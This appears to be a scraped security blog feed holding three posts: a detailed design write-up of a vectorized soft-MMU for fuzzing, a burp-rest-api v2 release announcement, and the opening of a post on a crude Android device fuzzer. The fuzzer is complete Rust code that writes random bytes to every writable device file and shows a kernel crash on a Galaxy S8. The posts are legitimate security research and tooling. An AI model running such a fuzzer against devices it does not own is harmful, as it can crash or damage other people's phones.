This has the awesome effect that only memory which is ever touched is brought in from disk. If you have a 100 terabyte memory snapshot but the fuzz case only touches 1 MiB of memory, you only ever actually read 1 MiB from disk (plus the metadata of the snapshot, e.g. PE/ELF headers). This memory is pulled in based on the page granularity in use. Since this is configurable you can tweak it to your heart’s desire.
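A hedged sketch of this lazy fault-in flow (all types and method names are invented for illustration; the real MMU exposes its own exception-handler hook):

// Sketch of faulting pages in from the snapshot on-demand.
use std::collections::HashMap;

const PAGE_SIZE: u64 = 8; // configurable; tiny 8-byte pages in this example

struct Snapshot { pages: HashMap<u64, [u8; PAGE_SIZE as usize]> }
struct SoftMmu  { mapped: HashMap<u64, [u8; PAGE_SIZE as usize]> }

// Called when the VM faults on `guest_addr`: pull the page from the snapshot
// (disk) if it exists there, map it in, and report whether the fault was
// handled so the VM can be resumed.
fn handle_fault(mmu: &mut SoftMmu, snap: &Snapshot, guest_addr: u64) -> bool {
    let page_addr = guest_addr & !(PAGE_SIZE - 1);
    match snap.pages.get(&page_addr) {
        Some(contents) => { mmu.mapped.insert(page_addr, *contents); true }
        None => false, // genuinely unmapped: deliver the fault to the fuzzer
    }
}

fn main() {
    let mut snap = Snapshot { pages: HashMap::new() };
    snap.pages.insert(0x1000, [0x90; 8]);
    let mut mmu = SoftMmu { mapped: HashMap::new() };
    assert!(handle_fault(&mut mmu, &snap, 0x1004));  // faulted in from "disk"
    assert!(!handle_fault(&mut mmu, &snap, 0x2000)); // not in the snapshot
}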

Sharing memory / forking

Memory which is only ever read has no reason to be copied for every VM. Thus we need a mechanism for sharing read-only memory between VMs. Further memory is shared between all cores running in the same “IL session”, or group of VMs fuzzing the same code and target.

We accomplish this by using a forking model. A ‘master’ MMU is created and an exception handler is installed to handle faults (to lazily pull in memory contents). The master MMU is the template for all future VMs and is the state of memory upon a reset.

When a core comes up, a fork from this ‘master’ MMU is created. Once again this is lazy. The child has no memory mapped in and will fault in pages from the master when needed.

When a page is accessed for reading only by a child VM the page in the child is directly mapped to the master’s copy. However since this memory could theoretically have write-permissions at the byte level, we protect this memory by setting an aliased bit on the last level page table, next to the dirty bit. This gives us a mechanism to prevent a master’s memory from ever getting updated even if it’s writable.

To allow for writes to the VM we add another bit to the last level page tables, a cow, or copy-on-write, bit. This is always accompanied with the aliased bit, and instead of delivering a fault on a write-to-aliased-memory access, we create a copy of the master’s page and allow writes to that.

An example of aliased/CoWed memory access

This leads us to a pretty sophisticated potential model of fault patterns. Let’s walk through a common case example.

  • An empty master MMU is created
  • An exception handler is added to the master MMU that faults in pages from the disk on-demand
  • A child is forked from the master
  • A read occurs to a page in the child
  • This causes an exception in the child as it has no memory
  • The exception handler recognizes there’s a master for this child and goes to access the master’s memory for this page
  • The master has no memory for this page and causes an exception
  • The master’s exception handler handles loading the page from disk, creating an entry
  • The master returns out with exception handled
  • The child directly links in the master’s page as aliased
  • Child returns with no exception
  • Child then dispatches a write to the same memory
  • The page is marked as aliased and thus cannot be written to
  • A copy of the master’s page is made
  • The permissions are checked in the page for write-access for all bytes being written to
  • The write occurs in the child-owned page
  • Success

While this is quite slow for the initial access, the child maintains its CoWed memory upon reset. This means that while the first few fuzz cases may be slow as memory is faulted in and copied, this cost eventually completely disappears as memory reaches a steady-state.

The overall result of this model is that memory is only ever read from disk if it is actually used, and it is only ever copied if it needs to be mutated. Memory which is only ever read is shared between all cores and greatly reduces cache pollution.

In theory a copy of all pages should be made for every NUMA node on the system to decrease latency in the case of a cache miss. This increases memory usage but increases performance.

All of this is done at page granularity which is configurable. Now you can see how big of an impact 8-byte pages can have as memory which may be writable (like a stack) but never is written to for a specific 8-byte region can be shared without extra memory cost.

This allows running 2048 4 GiB VMs with typically less than 200 MiB of memory usage as most fuzz cases touch a tiny amount of memory. Of course this will vary by target.

Deduplicated memory

Ha! You thought we were all done and ready to talk about performance? Not quite yet, we’ve got another trick up our sleeves!

Since we’re already sharing memory and have support for aliased memory, we can take it one step further. When we add memory to the VM we can deduplicate it.

This might sound really complex, but the implementation is so simple that there’s almost no reason to not do it. Rather than directly creating memory in the master, we can instead maintain a HashSet of pages and create aliased mappings to the entries in this set. When memory is added to a VM it is added to the deduplicated HashSet, which will create a new entry if it does not exist, or do nothing if it already exists. The page tables then directly reference the memory in this HashSet with the aliased bit set. Since pages contain the permissions, this automatically handles creating different copies of the same memory with different permissions.
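A minimal sketch of the deduplication idea (hypothetical types; real pages also carry the interleaved per-byte permissions, which is why identical contents with different permissions naturally dedupe into separate entries):

// Sketch of interning pages into a deduplicated set of shared, aliased pages.
use std::collections::HashSet;
use std::rc::Rc;

type Page = [u8; 8]; // one (tiny) guest page; contents + perms in reality

struct Dedup {
    unique: HashSet<Rc<Page>>,
}

impl Dedup {
    // Return a shared, read-only ("aliased") handle for `page`, creating a
    // new entry only if identical contents haven't been seen before.
    fn intern(&mut self, page: Page) -> Rc<Page> {
        if let Some(existing) = self.unique.get(&page) {
            return existing.clone();
        }
        let rc = Rc::new(page);
        self.unique.insert(rc.clone());
        rc
    }
}

fn main() {
    let mut dedup = Dedup { unique: HashSet::new() };
    let a = dedup.intern([0u8; 8]);
    let b = dedup.intern([0u8; 8]); // identical zero page: no new backing
    assert!(Rc::ptr_eq(&a, &b));
    assert_eq!(dedup.unique.len(), 1);
}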

Ta-da! We now will only create one read-only copy of each unique page. Say you have 1 MiB of read-writable zeros (would be 16 MiB when interleaved and with permissions), and are using 8-byte pages, you end up only ever creating one 8-byte page (128-byte actual backing) for all of this memory! As with other aliased memory, it can be cow memory and cloned if modified.

The gain from this is minimal in practice, but the code complexity increase given we already handle cow and aliased memory is so little that there’s really no reason to not do it. Since the Xeon Phi has no L3 cache, anything I can do to reduce cache pollution helps.

For example with a child with memory contents “AAAA00:D!!” where the “:D” was written in at offset 6.

cow_and_dedup


Performance

Alright so we’ve talked about everything we implement in the MMU, but we haven’t talked at all about the JIT or performance.

There are two important aspects to performance:

  • The JIT
  • Injecting fuzz cases / allocating memory

The JIT performance being important should be obvious. Memory accesses are the most expensive things we can do in our emulator and are responsible for bringing our best-case 2 trillion instructions/second benchmark down to about 40-120 billion instructions/second in an actual codebase (old numbers, old MMU, 32-bit model). The faster we can make memory accesses, the closer we can get to this best-case performance number. This means we have a potential 50x speedup if we were to make memory accesses cost nothing.

Next we have the maybe-not-so-obvious performance-critical aspect. Getting fuzz cases into the VMs and handling dynamic allocations in the VMs. While this is pretty much never a problem in traditional fuzzers, on a small target I may be running between 2-5 million fuzz cases per second. Meaning I need to somehow perform 2-5 million changes to the MMU per second (typically 1024-or-so byte inputs).

Further the VM may dynamically allocate memory via malloc() which we hook to get byte-level allocation support and to track uninitialized memory. A VM might do this a few times a fuzz case, so this could result in potentially tens of millions of MMU modifications per second.

The JIT / IL

We’re not going to go into insane details as I’ve open sourced the actual JIT used in the MMU described by this blog. However we can hit on some of the high-level JIT and IL concepts.

When we’re running under the JIT there may be arbitrary VMs running (the VM-0-must-always-be-running restriction described in the intro has been lifted), as well as potential differing addresses that they are accessing.

Differing addresses

Since a vectorized page table walk is more expensive than a single page walk, we first always check whether or not the VMs that are active are accessing the same memory. If they’re accessing the same memory then we can extract the address from one of the VMs and perform a single scalar page walk. If they differ then we perform the more expensive vectorized walk (which is still a huge improvement from the 32-bit model of a different scalar walk for every differing address).

Since the only metadata we store in the page tables are the aliased, CoW, and dirty bits, the scalar page walk is safe to do for all VMs. If permissions differ between the VMs that’s fine as those bytes are stored in the page itself.

The part of the page walk that gets complex during a vectorized walk is updating the dirty bits. In a scalar walk it’s simple. If the dirty bit is not set and we’re performing a write, then we add to the dirty list and set the dirty bit. Otherwise we skip updating the dirty bit and dirty list. This prevents duplicate entries in the dirty list. Further we store the guest address and the translated address in the dirty list so we do not have to re-translate during a reset. If an exception occurs at any point during the walk, all VMs that are enabled are reported to have caused the exception.

We also perform the aliased memory check if and only if the dirty bit was not set. This aliased memory check is how we prevent writing to an aliased page. Since this check has a non-zero cost, and since dirty memory can never be aliased, we simply skip the check if the memory is already dirty, as it’s guaranteed not to be aliased in that case.
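A rough sketch of that ordering for the scalar write path (field and function names are hypothetical; the byte-level permission check itself is omitted):

// Sketch of the scalar write path: dirty check first, aliased/CoW handling
// only when the page isn't already dirty, then dirty-list bookkeeping.
struct PageEntry {
    dirty:   bool,
    aliased: bool, // points at master/deduped memory, must not be written
    cow:     bool, // aliased memory that may be copied on first write
}

fn prepare_write(entry: &mut PageEntry, guest_addr: u64, dirty_list: &mut Vec<u64>) -> bool {
    if entry.dirty {
        // Dirty memory can never be aliased, so all further checks are skipped.
        return true;
    }
    if entry.aliased {
        if !entry.cow {
            return false; // fault: write to aliased, non-CoW memory
        }
        // Make a private copy of the master's page, then continue below.
        // (the actual copy is elided in this sketch)
        entry.aliased = false;
    }
    entry.dirty = true;
    dirty_list.push(guest_addr); // no duplicates: guarded by the dirty bit
    true
}

fn main() {
    let mut dirty_list = Vec::new();
    let mut entry = PageEntry { dirty: false, aliased: true, cow: true };
    assert!(prepare_write(&mut entry, 0x4000, &mut dirty_list));
    assert!(entry.dirty && !entry.aliased);
    assert_eq!(dirty_list, vec![0x4000]);
}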

Vectorized translation

However in a vectorized walk it gets really tricky. First it’s possible that the different addresses fail translation at differing levels (during page table walks and during permission checks). Further they can have differing dirtiness which might require multiple entries to be added to the dirty list.

To handle translations failing at different points, we mask off VMs as they fail at various points. At the end of the translation we determine if any VM failed, and if it did we can report the failure correctly for all VMs that failed at any point during the translation. This allows us to get a correct caused_vmexit mask from a single translation, rather than getting a partial report and getting more exceptions at a different translation stage on the next re-entry.

Vectorized dirty list updating

Further we have to handle dirty bits. I do this in a weird way right now and it might change over time. I’m trying to keep all possible JIT at parity with the interpreted implementation. The interpreted version is naive and simply performs the translations on all VMs in left-to-right order (see the JIT tests for this operation). This also maintains that no duplicates ever exist in the dirty lists.

To prevent duplicates in the dirty list we rely on the dirty bit in the page table, however when handling differing addresses we could potentially update the same address twice and create two dirty entries. The solution I made for this is to perform vectorized checks for the dirty bits, and if they’re already set we skip the expensive setting of the dirty bits. This is the fast path.

However in the slow path we store the addresses to the stack and individually update dirty bits and dirty entries for each lane. This prevents us from adding duplicates to the dirty list and keeps the JIT implementation at parity with the interpreter (thus allowing 1-to-1 checks for JIT correctness against the interpreter). Since we skip this slow path if the memory is already dirty, this probably won’t matter for performance. If it turns out to matter later on I might drop the no-duplicates-in-the-dirty-list restriction and vectorize updates to this list.

IL MMU routines

I’m going to have a whole blog on my IL, but it’s a simple SSA IL.

Memory accesses themselves are pretty fast in my vectorized model, however the translations are slow. To mitigate this I split up translations and read/write operations in my IL. Since page walks, dirty updates, and permission checks are done in my translate IL instruction, I’m able to reuse translations from previous locations in the IL graph which use the same IL expression as the address.

For example, a 4-byte translate for writing of rsp+0x50 occurs at the root block of a function. Future locations in the graph which read or write at the same location for 4-or-fewer bytes can then reuse the translation. Since it’s an SSA the rsp+0x50 value is tied to a certain version of rsp, thus changes to rsp do not cause the wrong translation to be used. This effectively deletes the page walks for stack locals and other memory which is not dynamically indexed in the function. It’s kind of like having a TLB in the IL itself.

Since the initial translate was responsible for the permission checks and updates of things like the RaW bits and dirty bits, we never have to run these checks again in this case. This turns memory operations into simple loads and stores.

Since stores are supersets of loads and larger sizes are supersets of smaller sizes, I can use translations from slightly different sizes and accesses.

Since it’s possible a VM exit occurs and memory/permissions are changed, I must invalidate these translations on VM exits. More specifically I can invalidate them only on VM entries where a page table modification was made since the last VM exit. This makes the invalidate case rare enough to not matter.

The performance numbers

These are the performance numbers (in cycles) for each type and size of operation. The translate times are the cost of walking the page tables and validating permissions, the access times are the cost of reading/writing to already translated memory. The benchmarks were done on a Xeon Phi 7210 on a single hardware thread. All times are in cycles for a translation and access times for all 8 lanes.

These are best-case translate/access times as it’s the same memory translated in a loop over and over causing the tables and memory in question to be present in L1 cache.

The divergent cases are ones where different addresses were supplied to each lane and force vectorized page walks.

Write: false | opsize: 1 | Diverge: false | Translate    37.8132 cycles | Access    10.5450 cycles
Write: false | opsize: 2 | Diverge: false | Translate    39.0831 cycles | Access    11.3500 cycles
Write: false | opsize: 4 | Diverge: false | Translate    39.7298 cycles | Access    10.6403 cycles
Write: false | opsize: 8 | Diverge: false | Translate    35.2704 cycles | Access     9.6881 cycles
Write: true  | opsize: 1 | Diverge: false | Translate    44.9504 cycles | Access    16.6908 cycles
Write: true  | opsize: 2 | Diverge: false | Translate    45.9377 cycles | Access    15.0110 cycles
Write: true  | opsize: 4 | Diverge: false | Translate    44.8083 cycles | Access    16.0191 cycles
Write: true  | opsize: 8 | Diverge: false | Translate    39.7565 cycles | Access     8.6500 cycles
Write: false | opsize: 1 | Diverge: true  | Translate   140.2084 cycles | Access    16.6964 cycles
Write: false | opsize: 2 | Diverge: true  | Translate   141.0708 cycles | Access    16.7114 cycles
Write: false | opsize: 4 | Diverge: true  | Translate   140.0859 cycles | Access    16.6728 cycles
Write: false | opsize: 8 | Diverge: true  | Translate   137.5321 cycles | Access    14.1959 cycles
Write: true  | opsize: 1 | Diverge: true  | Translate   158.5673 cycles | Access    22.9880 cycles
Write: true  | opsize: 2 | Diverge: true  | Translate   159.3837 cycles | Access    21.2704 cycles
Write: true  | opsize: 4 | Diverge: true  | Translate   156.8409 cycles | Access    22.9207 cycles
Write: true  | opsize: 8 | Diverge: true  | Translate   156.7783 cycles | Access    16.6400 cycles

Performance analysis

These numbers actually look really good. Just about 10 or so cycles for most accesses. The translations are much more expensive but with TLBs and caching the translations in the IL tree we should hopefully do these things rarely. The divergent translation times are about 3.5x more expensive than the scalar counterparts which is pretty impressive. 8 separate page walks at only 3.5x more cost than a single walk! That’s a big win for this new MMU!

TLBs (not implemented as of this writing)

Similar to the cached translations in the IL tree, I can have a TLB which caches a limited amount of arbitrary translations, just like an actual CPU or many other JITs. I currently plan on having TLB entries for each type of operation such that no permission checks are needed on read/write routines. However I could use a more typical TLB model where translations are cached (rather than permission checks and RaW updates), and then I would have to perform permission checks and RaW updates on all memory accesses (but not the translation phase).

I plan to just implement both models and benchmark them. The complexity of theorizing this performance difference is higher than just doing it and getting real measurements…

Fast injection/permission modifications

To support fast fuzz case injection and permission changes I have a few handwritten AVX-512 routines which are optimized for speed. These can then be tested against the naive reference implementation for correctness as there’s a much higher chance for mistakes.

I expose 3 different routines for this. A vectorized broadcast (writing the same memory to multiple VMs), a vectorized memset (applying the same byte to either memory contents or permissions), and a vectorized write-multiple.

Vectorized broadcast

This one is pretty simple. You supply an address in the VM, a payload, and a mask (deciding which VMs to actually write to). This will then write the same payload to all VMs which are enabled by the mask. This surprisingly doesn’t have a huge use case that I can think of yet.

Vectorized memset

Since permissions and memory are stored right next to each other this memset is written in a way that it can be used to update either permissions or contents. This takes in an address, a byte to broadcast, a bool indicating if it should write to permissions or contents, and a mask of VMs to broadcast to.

This routine is how permissions are updated in bulk. I can quickly update permissions on arbitrary sets of VMs in a vectorized manner. Further it can be used on contents to do things like handle zeroing of memory on a hooked call like malloc().

Vectorized write-multiple

This is how we get fuzz cases in. I take one address, a VM mask, and multiple inputs. I then inject those inputs to their corresponding VMs all at the same address. This allows me to write all my differing fuzz cases to the same location in memory very quickly. Since most fuzzing is writing an input to all VMs at the same location this should suffice for most cases. If I find I’m frequently writing multiple inputs to multiple different locations I’ll probably make another specialized routine.

Due to the complexities of handling partial reads from the input buffers in a vectorized way, this routine is restricted to writing 8-byte size aligned payloads to 8-byte aligned addresses. To get around this I just pad out my fuzz inputs to 8-byte boundaries.
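A hedged, naive sketch of the write-multiple semantics and the padding trick (per-lane pseudocode in Rust, not the interleaved AVX-512 routine; names are hypothetical):

// Sketch of write-multiple: one guest address, a per-VM mask, one padded
// input per VM lane.
const LANES: usize = 8;

// Pad a fuzz input out to the next 8-byte boundary, as required by the
// aligned write-multiple restriction described above.
fn pad_to_qword(input: &[u8]) -> Vec<u8> {
    let mut padded = input.to_vec();
    padded.resize((input.len() + 7) & !7, 0u8);
    padded
}

// Naive reference behavior: write each VM's (equal-length, padded) input at
// the same guest address, skipping lanes not selected by `mask`.
fn write_multiple(
    vm_memory: &mut [Vec<u8>; LANES],
    guest_addr: usize,
    inputs: &[Vec<u8>; LANES],
    mask: [bool; LANES],
) {
    for lane in 0..LANES {
        if !mask[lane] {
            continue;
        }
        let dst = &mut vm_memory[lane][guest_addr..guest_addr + inputs[lane].len()];
        dst.copy_from_slice(&inputs[lane]);
    }
}

fn main() {
    let mut vm_memory: [Vec<u8>; LANES] = std::array::from_fn(|_| vec![0u8; 64]);
    let inputs: [Vec<u8>; LANES] = std::array::from_fn(|_| pad_to_qword(b"fuzz"));
    write_multiple(&mut vm_memory, 16, &inputs, [true; LANES]);
    assert_eq!(&vm_memory[0][16..20], b"fuzz");
    assert_eq!(pad_to_qword(&[1, 2, 3]).len(), 8);
}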

Are these fast routines really needed?

For example, here are the benchmarks for the naive Rust implementation for a page table of shape [16, 16, 16, 13, 3]:

Note that the benchmarks are a single hardware thread running on a Xeon Phi 7210

Empty SoftMMU created in                            0.0000 seconds
1 MiB of deduped memory added in                    0.1873 seconds
1024 byte chunks read per second                30115.5741
1024 byte chunks written per second             29243.0394
1024 byte chunks memset per second              29340.3969
1024 byte chunks permed per second              34971.7952
1024 byte chunks write multiple per second       6864.1243

And the AVX-512 handwritten implementation on the same machine and same shape:

Empty SoftMMU created in                            0.0000 seconds
1 MiB of deduped memory added in                    0.1878 seconds
1024 byte chunks read per second                30073.5090
1024 byte chunks written per second            770678.8377
1024 byte chunks memset per second             777488.8143
1024 byte chunks permed per second             780162.1310
1024 byte chunks write multiple per second     751352.4038

Effectively a 25x speedup for the same result!

With a larger page size ([16, 16, 16, 6, 10]) the gap grows even wider, as the cached translation can be reused for longer and less time is spent translating pages:

Rust implementations:

Empty SoftMMU created in                            0.0001 seconds
1 MiB of deduped memory added in                    0.0829 seconds
1024 byte chunks read per second                30201.6634
1024 byte chunks written per second             31850.8188
1024 byte chunks memset per second              31818.1619
1024 byte chunks permed per second              34690.8332
1024 byte chunks write multiple per second       7345.5057

Hand-optimized implementations:

Empty SoftMMU created in                            0.0001 seconds
1 MiB of deduped memory added in                    0.0826 seconds
1024 byte chunks read per second                30168.3047
1024 byte chunks written per second          32993840.4624
1024 byte chunks memset per second           33131493.5139
1024 byte chunks permed per second           36606185.6217
1024 byte chunks write multiple per second   10775641.4470

In this case it’s over 1000x faster for some of the routines! At this rate we can trivially inject inputs much faster than the emulated code could possibly consume them!


Future improvements/ideas

Currently a full 64-bit address space is emulated. Since nothing we emulate uses a full 64-bit address space this is overkill and increases the page table memory size and page table walk costs. In the future I plan to add support for partial address spaces. For example, if you only define the page table to handle 16-bit addresses, it will, optionally based on another constant, make sure addresses are sign-extended or zero-extended from these 16-bit addresses. By supporting both sign-extended and zero-extended addresses we should be able to model every architecture's specific behavior. This means if running a 32-bit application in our 64-bit JIT we could use a 32-bit address space and decrease the cost of the MMU.
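As a rough sketch of what that canonicalization could look like, assuming a hypothetical 16-bit guest address width (in the real MMU the width and extension mode would be compile-time constants):

// Extend a 16-bit guest address back to the full 64-bit space, either
// sign-extended or zero-extended depending on the configured behavior
fn canonicalize_16(addr: u64, sign_extend: bool) -> u64 {
    if sign_extend {
        // e.g. 0x8000 -> 0xffff_ffff_ffff_8000
        addr as u16 as i16 as i64 as u64
    } else {
        // e.g. 0x8000 -> 0x0000_0000_0000_8000
        addr as u16 as u64
    }
}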

I could add more fast-injection routines as needed.

I may move permission checks to loads/stores rather than translation IL operations, to allow reuse of TLB entries for the same page but differing offsets/operations.

Introducing burp-rest-api v2

4 November 2018 at 23:00

Since the first commit back in 2016, burp-rest-api has been the default tool for BurpSuite-powered web scanning automation. Many security professionals and organizations have relied on this extension to orchestrate the work of Burp Spider and Scanner.

Today, we’re proud to announce a new major release of the tool: burp-rest-api v2.0.1

Starting in June 2018, Doyensec joined VMware in the development and support of the growing burp-rest-api community. After several years of experience in big tech companies and startups, we understand the need for security automation to improve efficacy and efficiency during software security activities. Unfortunately, internal security tools are rarely open-sourced, and too many companies are still reinventing the wheel. We believe that working together on foundational components, such as burp-rest-api, represents the future of security automation as it empowers companies of any size to build customized solutions.

After a few weeks of work, we cleaned up all the open issues and brought burp-rest-api to its next phase. In this blog post, we would like to summarize some of the improvements.

Releases

You can now download the latest version of burp-rest-api from https://github.com/vmware/burp-rest-api/releases as a precompiled release build. While this may not sound like a big deal, it’s actually the result of a major change in the plugin bootstrap mechanism. Until now, burp-rest-api required the original Burp Suite JAR in order to compile, hence we weren’t able to create stable releases due to licensing. By re-engineering the way burp-rest-api starts, it is now possible to build the extension without even having burpsuite_pro.jar.

git clone git@github.com:vmware/burp-rest-api.git
cd burp-rest-api
./gradlew clean build

Once built, you can now execute Burp with the burp-rest-api extension using the following command:

java -jar burp-rest-api-2.0.0.jar --burp.jar=./lib/burpsuite_pro.jar

Burp Extensions and BAppStore

Many users have asked for the ability to load additional extensions while running Burp with burp-rest-api. Thanks to a new bootstrap mechanism, burp-rest-api is loaded as a 2nd generation extension which makes it possible to load both custom and BAppStore extensions written in any of the supported programming languages.

Moreover, the tool allows loading extensions during application startup using the flag --burp.ext=<filename.{jar,rb,py}>.
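For example, loading a hypothetical Python extension at startup could look like this (the extension path is illustrative):

java -jar burp-rest-api-2.0.0.jar --burp.jar=./lib/burpsuite_pro.jar --burp.ext=./extensions/my-extension.py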

In order to implement this, we employed a classloading technique with a dummy entry point (BurpExtender.java) that loads the legacy Burp extension (LegacyBurpExtension.java) after the full Burp Suite has been loaded and launched (BurpService.java).

Bug Fixes and Improvements

In this release, we have also focused our efforts on a massive house-cleaning of open issues:

  • Better documentation and even a FAQs page
  • Burp Spider status API
  • Burp Configuration with configPath selection API
  • Enabled SpringBoot compression
  • Ability to customize the binding address:port for both Burp Proxy and burp-rest-api APIs via command line arguments
  • …and much more

Help Us Shape The Future of burp-rest-api

With the release of Burp Suite Professional 2.0 (beta), Burp includes a native REST API.

While the current functionalities are very limited, this is certainly going to change.

In the initial release, the REST API supports launching vulnerability scans and obtaining the results. Over time, additional functions will be added to the REST API.

It’s great that Burp users will finally benefit from a native REST API; however, this new feature makes us wonder about the future of this project.

Let us know how burp-rest-api can still provide value, and which directions the project could take. Comment on this Github Issue or tweet to our @Doyensec account.

Thank you for the support,

Luca Carettoni & Andrea Brancaleoni

Writing the worlds worst Android fuzzer, and then improving it

18 October 2018 at 09:57

So slimy it belongs in the slime tree

Why

Changelog

Date Info
2018-10-18 Initial

Tweeter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up, or I think you can use RSS or something if you’re still one of those people.

Disclaimer

I recognize the bugs discussed here are not widespread Android bugs individually. None of these are terribly critical and typically only affect one specific device. This blog is meant to be fun and silly and not meant to be a serious review of Android’s security.

Give me the code

Slime Tree Repo

Intro

Today we’re going to write arguably one of the worst Android fuzzers possible, experience unexpected success, and then make improvements until it’s probably only the second worst Android fuzzer.

When doing Android device fuzzing the first thing we need to do is get a list of devices on the phone and figure out which ones we can access. This is simple right? All we have to do is go into /dev and run ls -l, and anything with read or write permissions for all users we might have a whack at. Well… with selinux this is just not the case. There might be one person in the world who understands selinux but I’m pretty sure you need a Bombe to decode the selinux policies.

To solve this problem let’s do it the easy way and write a program that just runs in the context we want bugs from. This program will simply recursively list all files on the phone and actually attempt to open them for reading and writing. This will give us the true list of files/devices on the phone we are able to open. In this blog’s case we’re just going to use adb shell and thus we’re running as u:r:shell:s0.

Recursive listdiring

Alright so I want a quick list of all files on the phone and whether I can read or write to them. This is pretty easy, let’s do it in Rust.

/// Recursively list all files starting at the path specified by `dir`, saving
/// all files to `output_list`
fn listdirs(dir: &Path, output_list: &mut Vec<(PathBuf, bool, bool)>) {
    // List the directory
    let list = std::fs::read_dir(dir);

    if let Ok(list) = list {
        // Go through each entry in the directory, if we were able to list the
        // directory safely
        for entry in list {
            if let Ok(entry) = entry {
                // Get the path representing the directory entry
                let path = entry.path();

                // Get the metadata and discard errors
                if let Ok(metadata) = path.symlink_metadata() {
                    // Skip this file if it's a symlink
                    if metadata.file_type().is_symlink() {
                        continue;
                    }

                    // Recurse if this is a directory
                    if metadata.file_type().is_dir() {
                        listdirs(&path, output_list);
                    }

                    // Add this to the directory listing if it's a file
                    if metadata.file_type().is_file() {
                        let can_read =
                            OpenOptions::new().read(true).open(&path).is_ok();
                        
                        let can_write =
                            OpenOptions::new().write(true).open(&path).is_ok();

                        output_list.push((path, can_read, can_write));
                    }
                }
            }
        }
    }
}

Woo, that was pretty simple, to get a full directory listing of the whole phone we can just:

// List all files on the system
let mut dirlisting = Vec::new();
listdirs(Path::new("/"), &mut dirlisting);

Fuzzing

So now we have a list of all files. We now can use this for manual analysis and look through the listing and start doing source auditing of the phone. This is pretty much the correct way to find any good bugs, but maybe we can automate this process?

What if we just randomly try to read and write to the files. We don’t really have any idea what they expect, so let’s just write random garbage to them of reasonable sizes.

// List all files on the system
let mut listing = Vec::new();
listdirs(Path::new("/"), &mut listing);

// Fuzz buffer
let mut buf = [0x41u8; 8192];

// Fuzz forever
loop {
    // Pick a random file
    let rand_file = rand::random::<usize>() % listing.len();
    let (path, can_read, can_write) = &listing[rand_file];

    print!("{:?}\n", path);

    if *can_read {
        // Fuzz by reading
        let fd = OpenOptions::new().read(true).open(path);

        if let Ok(mut fd) = fd {
            let fuzz_size = rand::random::<usize>() % buf.len();
            let _ = fd.read(&mut buf[..fuzz_size]);
        }
    }

    if *can_write {
        // Fuzz by writing
        let fd = OpenOptions::new().write(true).open(path);
        if let Ok(mut fd) = fd {
            let fuzz_size = rand::random::<usize>() % buf.len();
            let _ = fd.write(&buf[..fuzz_size]);
        }
    }
}

When running this it pretty much stops right away, getting hung on things like /sys/kernel/debug/tracing/per_cpu/cpu1/trace_pipe. There are typically many sysfs and procfs files on the phone that will hang forever when trying to read from them. Since this prevents our “fuzzer” from running any longer we need to somehow get around blocking reads.

How about we just make, let’s say… 128 threads and just be okay with threads hanging? At least some of the others will keep going for at least a while. Here’s the complete program:

extern crate rand;

use std::sync::Arc;
use std::fs::OpenOptions;
use std::io::{Read, Write};
use std::path::{Path, PathBuf};

/// Maximum number of threads to fuzz with
const MAX_THREADS: u32 = 128;

/// Recursively list all files starting at the path specified by `dir`, saving
/// all files to `output_list`
fn listdirs(dir: &Path, output_list: &mut Vec<(PathBuf, bool, bool)>) {
    // List the directory
    let list = std::fs::read_dir(dir);

    if let Ok(list) = list {
        // Go through each entry in the directory, if we were able to list the
        // directory safely
        for entry in list {
            if let Ok(entry) = entry {
                // Get the path representing the directory entry
                let path = entry.path();

                // Get the metadata and discard errors
                if let Ok(metadata) = path.symlink_metadata() {
                    // Skip this file if it's a symlink
                    if metadata.file_type().is_symlink() {
                        continue;
                    }

                    // Recurse if this is a directory
                    if metadata.file_type().is_dir() {
                        listdirs(&path, output_list);
                    }

                    // Add this to the directory listing if it's a file
                    if metadata.file_type().is_file() {
                        let can_read =
                            OpenOptions::new().read(true).open(&path).is_ok();
                        
                        let can_write =
                            OpenOptions::new().write(true).open(&path).is_ok();

                        output_list.push((path, can_read, can_write));
                    }
                }
            }
        }
    }
}

/// Fuzz thread worker
fn worker(listing: Arc<Vec<(PathBuf, bool, bool)>>) {
    // Fuzz buffer
    let mut buf = [0x41u8; 8192];

    // Fuzz forever
    loop {
        let rand_file = rand::random::<usize>() % listing.len();
        let (path, can_read, can_write) = &listing[rand_file];

        //print!("{:?}\n", path);

        if *can_read {
            // Fuzz by reading
            let fd = OpenOptions::new().read(true).open(path);

            if let Ok(mut fd) = fd {
                let fuzz_size = rand::random::<usize>() % buf.len();
                let _ = fd.read(&mut buf[..fuzz_size]);
            }
        }

        if *can_write {
            // Fuzz by writing
            let fd = OpenOptions::new().write(true).open(path);
            if let Ok(mut fd) = fd {
                let fuzz_size = rand::random::<usize>() % buf.len();
                let _ = fd.write(&buf[..fuzz_size]);
            }
        }
    }
}

fn main() {
    // Optionally daemonize so we can swap from an ADB USB cable to a UART
    // cable and let this continue to run
    //daemonize();

    // List all files on the system
    let mut dirlisting = Vec::new();
    listdirs(Path::new("/"), &mut dirlisting);

    print!("Created listing of {} files\n", dirlisting.len());

    // We wouldn't do anything without any files
    assert!(dirlisting.len() > 0, "Directory listing was empty");

    // Wrap it in an `Arc`
    let dirlisting = Arc::new(dirlisting);

    // Spawn fuzz threads
    let mut threads = Vec::new();
    for _ in 0..MAX_THREADS {
        // Create a unique arc reference for this thread and spawn the thread
        let dirlisting = dirlisting.clone();
        threads.push(std::thread::spawn(move || worker(dirlisting)));
    }

    // Wait for all threads to complete
    for thread in threads {
        let _ = thread.join();
    }
}

extern {
    fn daemon(nochdir: i32, noclose: i32) -> i32;
}

pub fn daemonize() {
    print!("Daemonizing\n");

    unsafe {
        daemon(0, 0);
    }

    // Sleep to allow a physical cable swap
    std::thread::sleep(std::time::Duration::from_secs(10));
}

Pretty simple, nothing crazy here. We get a full phone directory listing, spin up MAX_THREADS threads, and those threads loop forever picking random files to read and write to.

Let me just give this a little push to the phone annnnnnnnnnnnnnd… the phone panicked. In fact almost all the phones I have at my desk panicked!

There we go. We have created a world class Android kernel fuzzer, printing out new 0-day!

In this case we ran this on a Samsung Galaxy S8 (G950FXXU4CRI5), let’s check out how we crashed by reading /proc/last_kmsg from the phone:

Unable to handle kernel paging request at virtual address 00662625
sec_debug_set_extra_info_fault = KERN / 0x662625
pgd = ffffffc0305b1000
[00662625] *pgd=00000000b05b7003, *pud=00000000b05b7003, *pmd=0000000000000000
Internal error: Oops: 96000006 [#1] PREEMPT SMP
exynos-snapshot: exynos_ss_get_reason 0x0 (CPU:1)
exynos-snapshot: core register saved(CPU:1)
CPUMERRSR: 0000000002180488, L2MERRSR: 0000000012240160
exynos-snapshot: context saved(CPU:1)
exynos-snapshot: item - log_kevents is disabled
